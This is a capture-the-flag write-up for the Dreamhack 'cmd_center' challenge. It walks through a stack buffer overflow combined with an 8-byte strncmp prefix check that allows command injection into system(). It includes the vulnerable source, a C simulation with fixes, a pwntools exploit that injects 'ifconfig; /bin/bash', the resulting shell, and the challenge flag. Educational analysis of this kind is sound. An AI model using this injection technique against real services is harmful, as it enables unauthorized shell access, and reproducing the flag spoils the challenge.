cmd_center
Enumeration
Reading the source code reveals its mechanics:
- The program reads input from the user and saves it to center_name.
- It then compares the first 8 bytes of cmd_ip with "ifconfig"; if they match, cmd_ip is passed to system() and executed.
┌──(m0nk3y@kali)-[~/DH/cmd_center]
└─$ cat cmd_center.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void init() {
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);
}

int main()
{
    char cmd_ip[256] = "ifconfig";
    int dummy;
    char center_name[24];

    init();

    printf("Center name: ");
    read(0, center_name, 100);

    if( !strncmp(cmd_ip, "ifconfig", 8)) {
        system(cmd_ip);
    }
    else {
        printf("Something is wrong!\n");
    }

    exit(0);
}
Exploitation
Although center_name is only 24 bytes, 100 bytes are read into it. This overflows the buffer and lets us overwrite cmd_ip, which in this binary starts 32 bytes past the beginning of center_name.
Also, because strncmp only compares the first 8 bytes of cmd_ip rather than 9 (the string plus its terminating null byte), anything that follows "ifconfig" is never checked. A value such as "ifconfig; /bin/bash" therefore passes the check, and system() runs the injected command.
Using this knowledge, I'll write a Python exploit that performs the command injection.
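To make the two bugs concrete, here is an added C example (not the challenge's own code) that models the relevant part of main()'s stack frame as one flat byte array, so the overflow can be reasoned about without relying on undefined behaviour. The offsets are assumptions taken from the working exploit: center_name at offset 0 and cmd_ip 32 bytes later. It reproduces the vulnerable read-and-check flow, puts the 8-byte prefix compare next to a full compare, and shows a bounded read that would have prevented the overflow. The payload it builds is constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Assumed frame layout (from the exploit's 32-byte pad): center_name at 0,
 * then dummy and alignment padding, then cmd_ip at offset 32. */
#define CENTER_NAME_SIZE 24
#define CMD_IP_OFF       32
#define CMD_IP_SIZE      256
#define READ_MAX         100                      /* read(0, center_name, 100) */
#define FRAME_SIZE       (CMD_IP_OFF + CMD_IP_SIZE)

/* Reproduces the vulnerable flow: zero-filled frame, cmd_ip = "ifconfig",
 * then up to READ_MAX payload bytes copied to center_name exactly as the
 * unbounded read() would do. Returns the command system() would receive,
 * or NULL when the 8-byte prefix check fails. `out` needs FRAME_SIZE bytes. */
const char *vulnerable_flow(const unsigned char *payload, size_t len, char *out)
{
    unsigned char frame[FRAME_SIZE];
    memset(frame, 0, sizeof frame);
    memcpy(frame + CMD_IP_OFF, "ifconfig", 8);    /* char cmd_ip[256] = "ifconfig"; */
    if (len > READ_MAX)
        len = READ_MAX;                           /* read() never returns more than 100 */
    memcpy(frame, payload, len);                  /* spills past center_name into cmd_ip */

    const char *cmd_ip = (const char *)(frame + CMD_IP_OFF);
    if (strncmp(cmd_ip, "ifconfig", 8) != 0)      /* only the first 8 bytes are checked */
        return NULL;
    /* At most 100 - 32 = 68 of cmd_ip's 256 bytes can be overwritten, so it is
     * still NUL-terminated and the copy below is bounded. */
    strcpy(out, cmd_ip);
    return out;
}

/* The challenge's check: a prefix match, so trailing shell syntax is ignored. */
int prefix_check(const char *cmd) { return strncmp(cmd, "ifconfig", 8) == 0; }

/* Full comparison including the terminator: "ifconfig; /bin/bash" is rejected. */
int exact_check(const char *cmd) { return strcmp(cmd, "ifconfig") == 0; }

/* Bounded read: never copy more than the destination holds, always terminate.
 * Returns the number of payload bytes actually kept. */
size_t bounded_read(char *dst, size_t dst_size, const unsigned char *src, size_t len)
{
    size_t n = len < dst_size - 1 ? len : dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}

int main(void)
{
    /* Constructed payload, same shape as the exploit: 32 filler bytes,
     * then the injected command placed where cmd_ip begins. */
    const char *inj = "ifconfig; /bin/bash";
    unsigned char payload[READ_MAX];
    memset(payload, 0x90, CMD_IP_OFF);
    memcpy(payload + CMD_IP_OFF, inj, strlen(inj) + 1);
    size_t len = CMD_IP_OFF + strlen(inj) + 1;

    char cmd[FRAME_SIZE];
    const char *run = vulnerable_flow(payload, len, cmd);
    printf("system() would run: %s\n", run ? run : "(rejected)");
    printf("prefix_check=%d exact_check=%d\n", prefix_check(inj), exact_check(inj));

    char center_name[CENTER_NAME_SIZE];
    size_t kept = bounded_read(center_name, sizeof center_name, payload, len);
    printf("bounded_read kept %zu of %zu bytes, cmd_ip untouched\n", kept, len);
    return 0;
}
```

The simulation shows why both defects are needed together: the overflow is what lets attacker bytes reach cmd_ip, and the prefix compare is what lets those bytes keep the "ifconfig" head while appending a second command. Fixing either one (a read bounded to sizeof center_name, or an exact comparison) closes this particular path, though passing user-influenced data to system() at all remains the deeper problem.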
┌──(m0nk3y@kali)-[~/DH/cmd_center]
└─$ cat exploit.py
import sys
from pwn import *

# usage: python2 exploit.py <host> <port>
client = remote(sys.argv[1], int(sys.argv[2]))

# 32 filler bytes cover center_name (24 bytes) plus dummy and alignment
# padding, so the bytes that follow land at the start of cmd_ip.
pad = b"\x90" * 32
# Still begins with "ifconfig" so the 8-byte strncmp passes; the rest is injected.
cmd = b"ifconfig; /bin/bash"
client.sendline(pad + cmd)

# The target apparently lacks ifconfig, so sh prints a "not found" error
# before /bin/bash starts; wait for it, then hand the shell over.
client.recvuntil(b"not found")
client.interactive()
By executing the script, I successfully acquired a shell.
┌──(m0nk3y@kali)-[~/DH/cmd_center]
└─$ python2 exploit.py host1.dreamhack.games 18970
[+] Opening connection to host1.dreamhack.games on port 18970: Done
[*] Switching to interactive mode
$ id
uid=1000(cmd_center) gid=1000(cmd_center) groups=1000(cmd_center)
Post Exploitation
With the shell acquired, I’m able to read the flag.
$ cat flag
DH{f4c11bf9ea5a1df24175ee4d11da0d16}